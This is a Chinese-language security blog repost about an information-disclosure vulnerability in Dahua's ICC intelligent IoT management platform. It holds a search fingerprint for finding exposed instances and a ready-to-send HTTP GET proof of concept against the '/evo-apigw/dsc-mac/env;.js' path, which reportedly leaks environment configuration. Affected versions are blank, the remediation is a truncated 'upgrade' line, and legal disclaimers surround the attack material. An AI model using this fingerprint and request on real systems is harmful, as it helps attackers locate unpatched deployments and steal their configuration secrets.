2026-01-26 14:42:39 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文档介绍大华ICC智能物联平台敏感信息泄露漏洞，通过访问/evo-apigw/dsc-mac/env;.js接口可窃取环境配置信息。文中提供了资产测绘指纹及漏洞复现POC，确认了漏洞危害，建议受影响方升级系统至最新版本以修复该安全问题。 综合评分： 85 文章分类： 漏洞POC,漏洞预警,WEB安全

cover_image

大华ICC智能物联综合管理平台敏感信息泄露漏洞附POC

原创

安服仔安服仔

北风漏洞复现文库

2026年1月26日 10:25 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

大华智能物联综合管理平台敏感信息泄露漏洞

—

影响版本

—

漏洞简介

浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台，旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术，实现了对各类物联网设备的统一管理和控制，提高了企业的运营效率和管理水平。信息泄露漏洞是指在软件系统中，由于安全控制不当导致敏感信息无意中暴露给不应具有访问权限的用户的情况。这类漏洞允许攻击者获取可能用于进一步攻击的关键信息，例如系统细节、用户数据、敏感配置信息等。信息泄露可以是直接的，如通过漏洞直接访问到敏感数据；也可以是间接的，如通过分析错误信息、系统行为等间接推断出敏感信息。

—

资产测绘

body="static/qwebchannel.js"&nbsp;&& body="/客户端会小于800/"

—

漏洞复现

POC

GET&nbsp;/evo-apigw/dsc-mac/env;.js HTTP/1.1Host: xxx.xx.xxx.xxUser-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;10.0;Win64; x64; rv:132.0) Gecko/20100101&nbsp;Firefox/132.0Accept: */*Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: keep-alive

—

修复建议

升级到系统版本

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库安服仔安服仔《大华ICC智能物联综合管理平台敏感信息泄露漏洞附POC》